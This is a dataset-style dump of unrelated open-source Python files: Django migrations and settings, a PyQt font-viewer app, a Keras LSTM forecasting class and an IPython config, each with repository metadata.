operations = [
migrations.AlterField(
model_name='user',
name='user_roles',
field=models.CharField(blank=True, choices=[('researcher', 'Researcher'), ('lecturer_senior', 'Lecturer - Senior Lecturer'), ('lecturer', 'Lecturer'), ('professor', 'Professor'), ('librarian', 'Librarian'), ('student_doctoral', 'Student - Doctoral Student'), ('student_master', 'Student - Master'), ('student_bachelor', 'Student - Bachelor'), ('student_phd', 'Student - Ph. D. Student'), ('other', 'Other')], max_length=20, null=True),
),
]
| [
"[email protected]"
] | |
a091250c35f7d8af56e48fde5a3b7559b25e7bd1 | 1427ebf65db634031540e75e22f394c8f1c55ed4 | /article/migrations/0005_auto_20190121_2249.py | 051b8b0fc3924892eb6570cd7f405ba960c80742 | [] | no_license | ulasdgndnz/django-blog | 95e189e7d12cf14a1b0f8dbca3bd5b76e5a59808 | 83e62390db6a802eb23468b5b640da5d3a7e253f | refs/heads/master | 2023-07-13T06:55:26.148715 | 2021-08-31T19:18:27 | 2021-08-31T19:18:27 | 167,540,932 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 485 | py | # Generated by Django 2.1.5 on 2019-01-21 19:49
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('article', '0004_auto_20190121_2214'),
]
operations = [
migrations.AlterModelOptions(
name='article',
options={'ordering': ['-created_date']},
),
migrations.AlterModelOptions(
name='comment',
options={'ordering': ['-comment_date']},
),
]
| [
"[email protected]"
] | |
6006274e5db45332602c0130dd859ac4d50d3679 | 99bd4d86aeb26f0cb9099d5d0396b4f11d440f65 | /venv/lib/python3.7/genericpath.py | 60866365235ad66165bd58294761ad4a9a94f451 | [] | no_license | mmorrison1670/django-marriageability | f173d305afdc0343ee5776bdbca5ca1d60098dba | 31915636bcf9cb417b2243479a910c45cfc3a3aa | refs/heads/master | 2020-06-13T17:51:41.712358 | 2019-07-06T12:55:25 | 2019-07-06T12:55:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 52 | py | /Users/mtm101/anaconda3/lib/python3.7/genericpath.py | [
"[email protected]"
] | |
010b33569d32d22e7299f5fbaccf1087498d35fd | 093180c6c3d1f1474a2037461286429ccbb7029f | /Ejercicios semana3/6.py | 54fbd9fcc8bb0f2f773814a68ab49a822f4c3ed6 | [] | no_license | DiegoxK/MisionTIC2022 | 2f143aa2d2d44122bad03d90b45a75794659b1d7 | eae7552830be2bd9b1a95d836eacc45be3c553ff | refs/heads/main | 2023-06-23T17:47:50.289990 | 2021-07-26T01:21:34 | 2021-07-26T01:21:34 | 381,203,172 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,650 | py | # Ejercicios
#6. Write a program that loads two lists of 15 values each. Report with
#a message which of the two lists has the greater accumulated total (messages "List 1
#greater", "List 2 greater", "Equal lists")
#Algorithm:
"""
-Read the values for both lists from input
-Run 15 iterations and add up the values inside each list
-Compare the totals
 if list 1's total is greater
     print(List 1 is the greater one)
 if list 2's total is greater
     print(List 2 is the greater one)
 if both lists have the same total
     print(Both lists have the same total)
"""
#Expected result:
"""
---------------------------------------------------------------
Input1 =
Output =
---------------------------------------------------------------
---------------------------------------------------------------
"""
#Transcription and verification of the result:
def listsizes1():
totallists = {"total1":0, "total2":0}
list1 = []
list2 = []
for x in range(15):
number1 = int(input("Enter the first list number: "))
list1.append(number1)
totallists["total1"] += number1
number2 = int(input("Enter the second list number: "))
totallists["total2"] += number2
list2.append(number2)
if totallists["total1"] > totallists["total2"]:
print("The first ({}) list is higher that the second ({})".format(totallists["total1"],totallists["total2"]))
elif totallists["total1"] < totallists["total2"]:
print("The second list ({1}) is higher that the first one ({0})".format(totallists["total1"],totallists["total2"]))
elif totallists["total1"] == totallists["total2"]:
print("Both list are same ({}) = ({})".format(totallists["total1"],totallists["total2"]))
def listsizes2():
totallists = {"total1":0, "total2":0}
list1 = [12,43,56,7,9,5,32,12,4,6,7,8,1,3,5]
list2 = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15]
for x in range(15):
totallists["total1"] += list1[x]
totallists["total2"] += list2[x]
if totallists["total1"] > totallists["total2"]:
print("The first ({}) list is higher that the second ({})".format(totallists["total1"],totallists["total2"]))
elif totallists["total1"] < totallists["total2"]:
print("The second list ({1}) is higher that the first one ({0})".format(totallists["total1"],totallists["total2"]))
elif totallists["total1"] == totallists["total2"]:
print("Both list are same ({}) = ({})".format(totallists["total1"],totallists["total2"]))
| [
"[email protected]"
] | |
da51364f707eb4935e28a9d9217829d8d5d91ab9 | 84dcf2731f83a44cc02c75249911ecd2aafe2f91 | /constants.py | d0b987edf568de32ee6c05d30261bbe4ded56c15 | [
"MIT"
] | permissive | xuefei1/Graph-Seq2Attn | 74a765dc44effa6b84077b40476b5985fcd96e5a | 336c69877e483c95d9996ee205d2a005342f08af | refs/heads/master | 2020-12-04T17:02:16.139122 | 2020-04-16T16:36:42 | 2020-04-16T16:36:42 | 231,847,054 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,682 | py | # one identifier for one types of dict
# for instance, DK_SOME_KEY means this is a key for a data_dict
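# e.g. a batch data_dict built with these keys might look like: {DK_BATCH_SIZE: 32, DK_PAD: 0}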
DK_BATCH_SIZE = "batch_size"
DK_PAD = "pad" # DK: general purpose data_dict
DK_SRC_WID = "src_wid" # src = msg + ctx
DK_SRC_WID_MASK = "src_wid_mask"
DK_SRC_SEQ_MASK = "src_seq_mask"
DK_MSG_WID = "msg_wid" # msg is usually shorter than ctx
DK_MSG_WID_MASK = "msg_wid_mask"
DK_CTX_WID = "ctx_wid" # msg is usually shorter than ctx
DK_CTX_WID_MASK = "ctx_wid_mask"
DK_SRC_POS = "src_pos"
DK_SRC_NER = "src_ner"
DK_SRC_SEG_LISTS = "src_seg_lists"
DK_TGT_GEN_WID = "tgt_gen_wid"
DK_TGT_CPY_WID = "tgt_cpy_wid"
DK_TGT_CPY_GATE = "tgt_cpy_gate"
DK_TGT_N_TOKEN = "tgt_n_token"
DK_TGT_SEG_LISTS = "tgt_seg_lists"
DK_SRC_IOB = "src_iob" # iob: SQuAD QG specific
DK_DOC_WID = "doc_wid"
DK_DOC_SEG_LISTS = "doc_seg_lists"
DK_DOC_WID_MASK = "doc_wid_mask"
DK_DOC_SENTS_WID = "doc_sents_wid"
DK_DOC_SENTS_WID_MASK = "doc_sents_wid_mask"
DK_TITLE_WID = "title_wid"
DK_TQ_SEG_LISTS = "title_seg_lists"
DK_TITLE_WID_MASK = "title_wid_mask"
DK_CONCEPT_SEG_LISTS = "concept_seg_lists"
DK_TGT_CONCEPT_GEN_WID = "tgt_concept_gen_wid" # concept gen specific
DK_TGT_CONCEPT_CPY_WID = "tgt_concept_cpy_wid"
DK_TGT_CONCEPT_CPY_GATE = "tgt_concept_cpy_gate"
DK_TGT_CONCEPT_N_TOKEN = "tgt_concept_n_token"
DK_TGT_TITLE_GEN_WID = "tgt_title_gen_wid" # title gen specific
DK_TGT_TITLE_CPY_WID = "tgt_title_cpy_wid"
DK_TGT_TITLE_CPY_GATE = "tgt_title_cpy_gate"
DK_TGT_TITLE_N_TOKEN = "tgt_title_n_token"
DK_SENT_DEPEND_GRAPH_LIST = "sent_depend_graph_list"
DK_DOC_KW_DIST_GRAPH = "doc_kw_dist_graph"
DK_DOC_SENT_MEAN_TFIDF_SIM_GRAPH = "doc_sent_mean_tfidf_sim_graph"
DK_DOC_SENT_PAIR_TFIDF_SIM_GRAPH = "doc_sent_pair_tfidf_sim_graph"
DK_DOC_SENT_WORD_OVERLAP_GRAPH = "doc_sent_word_overlap_graph"
DK_G2S_WID_GRAPH = "graph2seq_wid_graph"
SQGK_SRC_W_LIST = "src_word_list" # SQGK: SQuAD data reader keys
SQGK_SRC_IOB_LIST = "src_iob_list"
SQGK_SRC_POS_LIST = "src_pos_list"
SQGK_SRC_NER_LIST = "src_ner_list"
SQGK_TGT_W_LIST = "tgt_word_list"
SQGK_DATA_LIST = "data_list"
SQGK_IOB_T2I = "iob_t2i"
SQGK_POS_T2I = "pos_t2i"
SQGK_NER_T2I = "ner_t2i"
CHKPT_COMPLETED_EPOCHS = "completed_epochs" # CHKPT: checkpoint dict keys
CHKPT_MODEL = "model"
CHKPT_OPTIMIZER = "optimizer"
CHKPT_METADATA = "metadata"
CHKPT_PARAMS = "params"
CHKPT_BEST_EVAL_RESULT = "best_eval_result"
CHKPT_BEST_EVAL_EPOCH = "best_eval_epoch"
CHKPT_PAST_EVAL_RESULTS = "past_eval_results"
GK_EDGE_WEIGHT = "edge_weight" # GK: graph keys
GK_EDGE_WORD_PAIR = "edge_word_pair"
GK_EDGE_GV_IDX_PAIR = "edge_v_idx_pair"
GK_EDGE_TYPE = "edge_type"
GK_EDGE_DIR = "edge_directed"
GK_EDGE_UNDIR = "edge_undirected"
GK_SENT_DEP = "sentence_depends"
| [
"[email protected]"
] | |
d05b426c62a570e3558ce0569edad294e14a81f4 | b8e7611dc06d804f63db05fd25045b626ccbb067 | /CRM/event/serializer.py | 1dcbd9eb36ee10a02095145f94138d588ef08d0d | [
"MIT"
] | permissive | ydjabela/OCR_P12 | 5af7e4b4e7f7ab1cf6d427d99e65bfe5074b949e | 105364ea768c2adf3f0416dac7591639eec6d66a | refs/heads/main | 2023-05-30T06:16:15.514142 | 2021-06-11T08:04:28 | 2021-06-11T08:04:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 297 | py | # Django REST Libs
from rest_framework import serializers
# Local Libs
from .models import Event
class EventSerializer(serializers.ModelSerializer):
"""
Event serializer
Based on serializers.ModelSerializer
"""
class Meta():
model = Event
fields = "__all__"
| [
"[email protected]"
] | |
373f958ddc1ae69c1864e555edf002dcc1ad119d | 7ac6ce76ddfdaee255454c41684cab67ed52a5b8 | /test_mo/urls.py | bb605fb2b4bbbc95526280136d8544d1504731c4 | [
"MIT"
] | permissive | Qmanes/test_mo | dc4825ae7995f6cbb18248b0e25f4a604f553a5b | f175f3d623d499473d88d2357769a3259b9b7484 | refs/heads/main | 2023-03-03T01:51:16.096580 | 2021-01-26T03:06:27 | 2021-01-26T03:06:27 | 332,954,264 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 801 | py | """test_mo URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import include, path
urlpatterns = [
path('pokemons/', include('pokemons.urls')),
path('admin/', admin.site.urls),
]
| [
"[email protected]"
] | |
32e70993541d9d1f2b8e64c11df221809bcf56e3 | c4d3ef434d1449294ba8b83a94a121253a2cfb48 | /http_main.py | 49d95bada9497a7d3276c4c7b8c20e31efe266c7 | [
"Apache-2.0"
] | permissive | RITCHIEHuang/qt-process | d7b6e2ecff220b3bb0e27b2a24b9c52981ae5b25 | e701a2992aa4690d1a5d79d741bf2339ca890ac4 | refs/heads/master | 2020-05-03T20:40:10.050494 | 2019-04-01T15:37:54 | 2019-04-01T15:37:54 | 178,807,657 | 0 | 1 | null | 2019-04-01T15:37:55 | 2019-04-01T07:20:48 | Python | UTF-8 | Python | false | false | 5,242 | py | import os
import sys
from shutil import rmtree
from PyQt5.QtCore import Qt, QDir # QPoint represents a point with integer precision on a plane
from PyQt5.QtGui import QFontDatabase, QFont # QPainter draws all kinds of shapes
from PyQt5.QtWidgets import *
# Set the window size and the grid-related properties
import http_login
# Main window
from utils import delete_user_info
def print_info(function_name):
print("=" * 50 + function_name + "=" * 50)
class User(QMainWindow):
def __init__(self, fontfile, txtfile, parent=None):
super(User, self).__init__(parent)
self.ui_login = http_login.Window()
        self.setWindowTitle("Font Tool")
self.ROW_COUNT = 8
self.COLUMN_COUNT = 10
self.table = QTableWidget(self.ROW_COUNT, self.COLUMN_COUNT, self)
centralWidget = QWidget(self)
self.setCentralWidget(centralWidget)
gridLayout = QGridLayout(self)
centralWidget.setLayout(gridLayout)
gridLayout.addWidget(self.table, 0, 0)
self.font_file = fontfile
self.txt_file = txtfile
self.user = None
        self.setup_ui() # initialize the UI widgets
def setUser(self, user):
self.user = user
def setup_ui(self):
self.resize(800, 600)
        # Menu bar and action bindings
        menubar = self.menuBar()
        menubar.setNativeMenuBar(False) # use a custom menu bar instead of the system-native one
        menubar.setFixedHeight(30) # fixed height for the expanded menu
        file_menu = menubar.addMenu('& File')
        help_menu = menubar.addMenu('& Help')
        save_act = QAction('Save As', self)
        save_act.setShortcut('Ctrl+S')
        save_act.triggered.connect(self.slot_act_save_file) # bind saving to the Save As dialog
        logout_act = QAction('Log Out', self)
        logout_act.triggered.connect(self.slot_act_logout)
        quit_act = QAction('Quit', self)
        quit_act.triggered.connect(self.slot_act_close) # window close action
        # Add the actions to the menu bar
        file_menu.addAction(save_act)
        file_menu.addSeparator() # separator
file_menu.addAction(quit_act)
file_menu.addAction(logout_act)
self.create_table()
def create_table(self):
print_info(sys._getframe().f_code.co_name)
self.table.verticalHeader().setHidden(True)
self.table.horizontalHeader().setHidden(True)
        # Load the font
fontId = QFontDatabase.addApplicationFont(self.font_file)
fontFamilies = QFontDatabase.applicationFontFamilies(fontId)
font = QFont(fontFamilies[0], 75)
        # Load the text characters
character_list = []
with open(self.txt_file, 'r', encoding="gbk") as f:
data = f.readlines()
for line in data:
for i in list(line.strip("\n")):
character_list.append(i)
print(character_list)
self.ROW_COUNT = max(self.ROW_COUNT, int(len(character_list) / self.COLUMN_COUNT))
print("row : %d, column: %d" % (self.ROW_COUNT, self.COLUMN_COUNT))
for i in range(self.COLUMN_COUNT):
self.table.setColumnWidth(i, 75)
for j in range(self.ROW_COUNT):
self.table.setRowHeight(j, 75)
t = 0
for i in range(self.ROW_COUNT):
for j in range(self.COLUMN_COUNT):
if t >= len(character_list):
break
item = QTableWidgetItem()
item.setTextAlignment(Qt.AlignCenter)
item.setFont(font)
item.setText(character_list[t])
self.table.setItem(i, j, item)
t = t + 1
    # Save the displayed contents to a new file
def slot_act_save_file(self):
print_info(sys._getframe().f_code.co_name)
        filename, filetype = QFileDialog.getSaveFileName(self, 'Save As', '')
        if filename == "":
            print("\nSelection cancelled")
            return
        print("\nYou chose to save the file as:")
        print(filename)
        print(type(filename))
        print("File filter type: ", filetype)
        with open(self.font_file, 'rb') as f:
            content = f.read()
        with open(filename, 'wb') as f2:
            f2.write(content)
        # Pop up a message box
        msg = QMessageBox(self)
        msg.setInformativeText("Saved to: " + filename)
        msg.setWindowTitle("Save File")
msg.setDefaultButton(QMessageBox.Ok)
msg.exec_()
def closeEvent(self, event):
        # delete the temporary files
self.delete_temp_files()
event.accept()
def slot_act_close(self):
        reply = QMessageBox.question(self, 'Message', 'Are you sure you want to quit?', QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
self.close()
def slot_act_logout(self):
delete_user_info(self.user)
self.user = None
self.ui_login.show()
self.hide()
def delete_temp_files(self):
path = QDir.currentPath() + "/tmp/"
rmtree(path)
if __name__ == "__main__":
app = QApplication(sys.argv)
    # User() requires a font file and a text file; these names are illustrative placeholders
    ui = User("font.ttf", "characters.txt")
ui.show()
sys.exit(app.exec_())
| [
"[email protected]"
] | |
8c96c6ea9120d6fdd77fe8c0844928dbe8da7bd4 | a0ed50752fb3bc3f3e2be0a483fb0a9064f0f00c | /core/model.py | ad7a61cc67d33f6af6d8cc2c64494286c74ab7bb | [] | no_license | Liu802313/LSTM-Neural-Network-for-Time-Series-Prediction | e798bbb548c94e38ffd48dbcb19eada72a033c56 | 5d0f57ce08da7745a7ad3ab3a69f5e26414aa1ee | refs/heads/master | 2021-09-24T17:40:39.843080 | 2018-10-12T03:25:20 | 2018-10-12T03:25:20 | 152,346,569 | 0 | 0 | null | 2018-10-10T01:48:34 | 2018-10-10T01:48:34 | null | UTF-8 | Python | false | false | 4,200 | py | import os
import math
import numpy as np
import datetime as dt
from numpy import newaxis
from core.utils import Timer
from keras.layers import Dense, Activation, Dropout, LSTM
from keras.models import Sequential, load_model
from keras.callbacks import EarlyStopping, ModelCheckpoint
class Model():
"""A class for an building and inferencing an lstm model"""
def __init__(self):
self.model = Sequential()
def load_model(self, filepath):
print('[Model] Loading model from file %s' % filepath)
self.model = load_model(filepath)
def build_model(self, configs):
timer = Timer()
timer.start()
for layer in configs['model']['layers']:
neurons = layer['neurons'] if 'neurons' in layer else None
dropout_rate = layer['rate'] if 'rate' in layer else None
activation = layer['activation'] if 'activation' in layer else None
return_seq = layer['return_seq'] if 'return_seq' in layer else None
input_timesteps = layer['input_timesteps'] if 'input_timesteps' in layer else None
input_dim = layer['input_dim'] if 'input_dim' in layer else None
if layer['type'] == 'dense':
self.model.add(Dense(neurons, activation=activation))
if layer['type'] == 'lstm':
self.model.add(LSTM(neurons, input_shape=(input_timesteps, input_dim), return_sequences=return_seq))
if layer['type'] == 'dropout':
self.model.add(Dropout(dropout_rate))
self.model.compile(loss=configs['model']['loss'], optimizer=configs['model']['optimizer'])
print('[Model] Model Compiled')
timer.stop()
def train(self, x, y, epochs, batch_size):
timer = Timer()
timer.start()
print('[Model] Training Started')
print('[Model] %s epochs, %s batch size' % (epochs, batch_size))
save_fname = 'saved_models/%s-e%s.h5' % (dt.datetime.now().strftime('%d%m%Y-%H%M%S'), str(epochs))
callbacks = [
EarlyStopping(monitor='val_loss', patience=2),
ModelCheckpoint(filepath=save_fname, monitor='val_loss', save_best_only=True)
]
self.model.fit(
x,
y,
epochs=epochs,
batch_size=batch_size,
callbacks=callbacks
)
self.model.save(save_fname)
print('[Model] Training Completed. Model saved as %s' % save_fname)
timer.stop()
def train_generator(self, data_gen, epochs, batch_size, steps_per_epoch):
timer = Timer()
timer.start()
print('[Model] Training Started')
print('[Model] %s epochs, %s batch size, %s batches per epoch' % (epochs, batch_size, steps_per_epoch))
save_fname = 'saved_models/%s-e%s.h5' % (dt.datetime.now().strftime('%d%m%Y-%H%M%S'), str(epochs))
callbacks = [
ModelCheckpoint(filepath=save_fname, monitor='loss', save_best_only=True)
]
self.model.fit_generator(
data_gen,
steps_per_epoch=steps_per_epoch,
epochs=epochs,
callbacks=callbacks,
workers=1
)
print('[Model] Training Completed. Model saved as %s' % save_fname)
timer.stop()
def predict_point_by_point(self, data):
#Predict each timestep given the last sequence of true data, in effect only predicting 1 step ahead each time
predicted = self.model.predict(data)
predicted = np.reshape(predicted, (predicted.size,))
return predicted
def predict_sequences_multiple(self, data, window_size, prediction_len):
#Predict sequence of 50 steps before shifting prediction run forward by 50 steps
prediction_seqs = []
for i in range(int(len(data)/prediction_len)):
curr_frame = data[i*prediction_len]
predicted = []
for j in range(prediction_len):
predicted.append(self.model.predict(curr_frame[newaxis,:,:])[0,0])
curr_frame = curr_frame[1:]
curr_frame = np.insert(curr_frame, [window_size-2], predicted[-1], axis=0)
prediction_seqs.append(predicted)
return prediction_seqs
def predict_sequence_full(self, data, window_size):
#Shift the window by 1 new prediction each time, re-run predictions on new window
curr_frame = data[0]
predicted = []
for i in range(len(data)):
predicted.append(self.model.predict(curr_frame[newaxis,:,:])[0,0])
curr_frame = curr_frame[1:]
curr_frame = np.insert(curr_frame, [window_size-2], predicted[-1], axis=0)
return predicted
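# Minimal usage sketch (added; assumes the project's JSON config layout with
# 'model' and 'training' sections -- adjust names to the real config file):
# import json
# configs = json.load(open('config.json'))
# model = Model()
# model.build_model(configs)
# model.train(x_train, y_train, epochs=configs['training']['epochs'],
#             batch_size=configs['training']['batch_size'])
# point_preds = model.predict_point_by_point(x_test)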
| [
"[email protected]"
] | |
d96b1df7ff514b35656306fc3610338089e4842e | 2c8efabdc717946402e191eee6653bc46c188223 | /oect_processing/__init__.py | 05005fd407169b4bafb783be5272c0b057f3665b | [] | no_license | rajgiriUW/OECT_processing | 643eb0342d82dd7a63e94a3ab1ddc33aadd379ab | 0db3cf492a3e56f676cd04c62d0cda8d62eba22b | refs/heads/master | 2023-07-06T19:31:18.821966 | 2023-06-23T21:52:34 | 2023-06-23T21:52:34 | 111,010,935 | 1 | 1 | null | 2021-04-12T07:10:23 | 2017-11-16T19:05:54 | Jupyter Notebook | UTF-8 | Python | false | false | 217 | py | from . import oect_utils
#import nonoect_utils
#import specechem
from .oect import OECT
from .oect_device import OECTDevice
__all__ = oect_utils.__all__
#__all__ += nonoect_utils.__all__
#__all__ += specechem.__all__ | [
"[email protected]"
] | |
62b1de7a99fc7f74b2b883ee7c9d8c69a7e30f5a | d2d9712a9a028707fab199c1eb835052ac8e60b7 | /home/.ipython/profile_default/ipython_config.py | c63f614f64d9bf41c78bce3ed6b871bc68355990 | [] | no_license | kei10in/dotfiles-old | f5b384f6fedfc125f85e46bb35c4bd79069a8179 | 1be78223c197eaac682f9075644456e120c96e78 | refs/heads/master | 2022-04-09T15:39:34.772951 | 2020-03-12T13:25:14 | 2020-03-12T13:25:14 | 2,340,600 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,058 | py | # -*- coding: utf-8 -*-
# Configuration file for ipython.
c = get_config()
#------------------------------------------------------------------------------
# InteractiveShellApp configuration
#------------------------------------------------------------------------------
# A Mixin for applications that start InteractiveShell instances.
#
# Provides configurables for loading extensions and executing files as part of
# configuring a Shell environment.
#
# Provides init_extensions() and init_code() methods, to be called after
# init_shell(), which must be implemented by subclasses.
# Execute the given command string.
# c.InteractiveShellApp.code_to_run = ''
# lines of code to run at IPython startup.
# c.InteractiveShellApp.exec_lines = []
# If true, an 'import *' is done from numpy and pylab, when using pylab
# c.InteractiveShellApp.pylab_import_all = True
# A list of dotted module names of IPython extensions to load.
# c.InteractiveShellApp.extensions = []
# dotted module name of an IPython extension to load.
# c.InteractiveShellApp.extra_extension = ''
# List of files to run at IPython startup.
# c.InteractiveShellApp.exec_files = []
# A file to be run
# c.InteractiveShellApp.file_to_run = ''
#------------------------------------------------------------------------------
# TerminalIPythonApp configuration
#------------------------------------------------------------------------------
# TerminalIPythonApp will inherit config from: BaseIPythonApplication,
# Application, InteractiveShellApp
# Execute the given command string.
# c.TerminalIPythonApp.code_to_run = ''
# The IPython profile to use.
# c.TerminalIPythonApp.profile = 'default'
# Set the log level by value or name.
# c.TerminalIPythonApp.log_level = 30
# lines of code to run at IPython startup.
# c.TerminalIPythonApp.exec_lines = []
# Enable GUI event loop integration ('qt', 'wx', 'gtk', 'glut', 'pyglet').
# c.TerminalIPythonApp.gui = None
# Pre-load matplotlib and numpy for interactive use, selecting a particular
# matplotlib backend and loop integration.
# c.TerminalIPythonApp.pylab = None
# Suppress warning messages about legacy config files
# c.TerminalIPythonApp.ignore_old_config = False
# Create a massive crash report when IPython enconters what may be an internal
# error. The default is to append a short message to the usual traceback
# c.TerminalIPythonApp.verbose_crash = False
# If a command or file is given via the command-line, e.g. 'ipython foo.py
# c.TerminalIPythonApp.force_interact = False
# If true, an 'import *' is done from numpy and pylab, when using pylab
# c.TerminalIPythonApp.pylab_import_all = True
# The name of the IPython directory. This directory is used for logging
# configuration (through profiles), history storage, etc. The default is usually
# $HOME/.ipython. This options can also be specified through the environment
# variable IPYTHON_DIR.
# c.TerminalIPythonApp.ipython_dir = '/Users/keisuke/.config/ipython'
# Whether to display a banner upon starting IPython.
# c.TerminalIPythonApp.display_banner = True
# Start IPython quickly by skipping the loading of config files.
# c.TerminalIPythonApp.quick = False
# A list of dotted module names of IPython extensions to load.
# c.TerminalIPythonApp.extensions = []
# Whether to install the default config files into the profile dir. If a new
# profile is being created, and IPython contains config files for that profile,
# then they will be staged into the new directory. Otherwise, default config
# files will be automatically generated.
# c.TerminalIPythonApp.copy_config_files = False
# dotted module name of an IPython extension to load.
# c.TerminalIPythonApp.extra_extension = ''
# List of files to run at IPython startup.
# c.TerminalIPythonApp.exec_files = []
# Whether to overwrite existing config files when copying
# c.TerminalIPythonApp.overwrite = False
# A file to be run
# c.TerminalIPythonApp.file_to_run = ''
#------------------------------------------------------------------------------
# TerminalInteractiveShell configuration
#------------------------------------------------------------------------------
# TerminalInteractiveShell will inherit config from: InteractiveShell
# auto editing of files with syntax errors.
# c.TerminalInteractiveShell.autoedit_syntax = False
# Use colors for displaying information about objects. Because this information
# is passed through a pager (like 'less'), and some pagers get confused with
# color codes, this capability can be turned off.
# c.TerminalInteractiveShell.color_info = True
#
# c.TerminalInteractiveShell.history_length = 10000
# Don't call post-execute functions that have failed in the past.
# c.TerminalInteractiveShell.disable_failing_post_execute = False
# Show rewritten input, e.g. for autocall.
# c.TerminalInteractiveShell.show_rewritten_input = True
# Set the color scheme (NoColor, Linux, or LightBG).
# c.TerminalInteractiveShell.colors = 'LightBG'
# Autoindent IPython code entered interactively.
# c.TerminalInteractiveShell.autoindent = True
#
# c.TerminalInteractiveShell.separate_in = '\n'
# Deprecated, use PromptManager.in2_template
# c.TerminalInteractiveShell.prompt_in2 = ' .\\D.: '
#
# c.TerminalInteractiveShell.separate_out = ''
# Deprecated, use PromptManager.in_template
# c.TerminalInteractiveShell.prompt_in1 = 'In [\\#]: '
# Enable deep (recursive) reloading by default. IPython can use the deep_reload
# module which reloads changes in modules recursively (it replaces the reload()
# function, so you don't need to change anything to use it). deep_reload()
# forces a full reload of modules whose code may have changed, which the default
# reload() function does not. When deep_reload is off, IPython will use the
# normal reload(), but deep_reload will still be available as dreload().
# c.TerminalInteractiveShell.deep_reload = False
# Make IPython automatically call any callable object even if you didn't type
# explicit parentheses. For example, 'str 43' becomes 'str(43)' automatically.
# The value can be '0' to disable the feature, '1' for 'smart' autocall, where
# it is not applied if there are no more arguments on the line, and '2' for
# 'full' autocall, where all callable objects are automatically called (even if
# no arguments are present).
# c.TerminalInteractiveShell.autocall = 0
# Number of lines of your screen, used to control printing of very long strings.
# Strings longer than this number of lines will be sent through a pager instead
# of directly printed. The default value for this is 0, which means IPython
# will auto-detect your screen size every time it needs to print certain
# potentially long strings (this doesn't change the behavior of the 'print'
# keyword, it's only triggered internally). If for some reason this isn't
# working well (it needs curses support), specify it yourself. Otherwise don't
# change the default.
# c.TerminalInteractiveShell.screen_length = 0
# Set the editor used by IPython (default to $EDITOR/vi/notepad).
# c.TerminalInteractiveShell.editor = 'emacs'
# Deprecated, use PromptManager.justify
# c.TerminalInteractiveShell.prompts_pad_left = True
# The part of the banner to be printed before the profile
# c.TerminalInteractiveShell.banner1 = 'Python 3.2.3 (default, Apr 19 2012, 22:49:48) \nType "copyright", "credits" or "license" for more information.\n\nIPython 0.12.1 -- An enhanced Interactive Python.\n? -> Introduction and overview of IPython\'s features.\n%quickref -> Quick reference.\nhelp -> Python\'s own help system.\nobject? -> Details about \'object\', use \'object??\' for extra details.\n'
#
# c.TerminalInteractiveShell.readline_parse_and_bind = ['tab: complete', '"\\C-l": clear-screen', 'set show-all-if-ambiguous on', '"\\C-o": tab-insert', '"\\C-r": reverse-search-history', '"\\C-s": forward-search-history', '"\\C-p": history-search-backward', '"\\C-n": history-search-forward', '"\\e[A": history-search-backward', '"\\e[B": history-search-forward', '"\\C-k": kill-line', '"\\C-u": unix-line-discard']
# The part of the banner to be printed after the profile
# c.TerminalInteractiveShell.banner2 = ''
#
# c.TerminalInteractiveShell.separate_out2 = ''
#
# c.TerminalInteractiveShell.wildcards_case_sensitive = True
#
# c.TerminalInteractiveShell.debug = False
# Set to confirm when you try to exit IPython with an EOF (Control-D in Unix,
# Control-Z/Enter in Windows). By typing 'exit' or 'quit', you can force a
# direct exit without any confirmation.
# c.TerminalInteractiveShell.confirm_exit = True
#
# c.TerminalInteractiveShell.ipython_dir = ''
#
# c.TerminalInteractiveShell.readline_remove_delims = '-/~'
# Start logging to the default log file.
# c.TerminalInteractiveShell.logstart = False
# The name of the logfile to use.
# c.TerminalInteractiveShell.logfile = ''
# The shell program to be used for paging.
# c.TerminalInteractiveShell.pager = 'less'
# Enable magic commands to be called without the leading %.
# c.TerminalInteractiveShell.automagic = True
# Save multi-line entries as one entry in readline history
# c.TerminalInteractiveShell.multiline_history = True
#
# c.TerminalInteractiveShell.readline_use = True
# Start logging to the given file in append mode.
# c.TerminalInteractiveShell.logappend = ''
#
# c.TerminalInteractiveShell.xmode = 'Context'
#
# c.TerminalInteractiveShell.quiet = False
# Enable auto setting the terminal title.
# c.TerminalInteractiveShell.term_title = False
#
# c.TerminalInteractiveShell.object_info_string_level = 0
# Deprecated, use PromptManager.out_template
# c.TerminalInteractiveShell.prompt_out = 'Out[\\#]: '
# Set the size of the output cache. The default is 1000, you can change it
# permanently in your config file. Setting it to 0 completely disables the
# caching system, and the minimum value accepted is 20 (if you provide a value
# less than 20, it is reset to 0 and a warning is issued). This limit is
# defined because otherwise you'll spend more time re-flushing a too small cache
# than working
# c.TerminalInteractiveShell.cache_size = 1000
# Automatically call the pdb debugger after every exception.
# c.TerminalInteractiveShell.pdb = False
#------------------------------------------------------------------------------
# PromptManager configuration
#------------------------------------------------------------------------------
# This is the primary interface for producing IPython's prompts.
# Output prompt. '\#' will be transformed to the prompt number
# c.PromptManager.out_template = 'Out[\\#]: '
# Continuation prompt.
# c.PromptManager.in2_template = ' .\\D.: '
# If True (default), each prompt will be right-aligned with the preceding one.
# c.PromptManager.justify = True
# Input prompt. '\#' will be transformed to the prompt number
c.PromptManager.in_template = '{color.LightBlue}\\w\n{color.LightCyan}>>> '
#
# c.PromptManager.color_scheme = 'Linux'
#------------------------------------------------------------------------------
# ProfileDir configuration
#------------------------------------------------------------------------------
# An object to manage the profile directory and its resources.
#
# The profile directory is used by all IPython applications, to manage
# configuration, logging and security.
#
# This object knows how to find, create and manage these directories. This
# should be used by any code that wants to handle profiles.
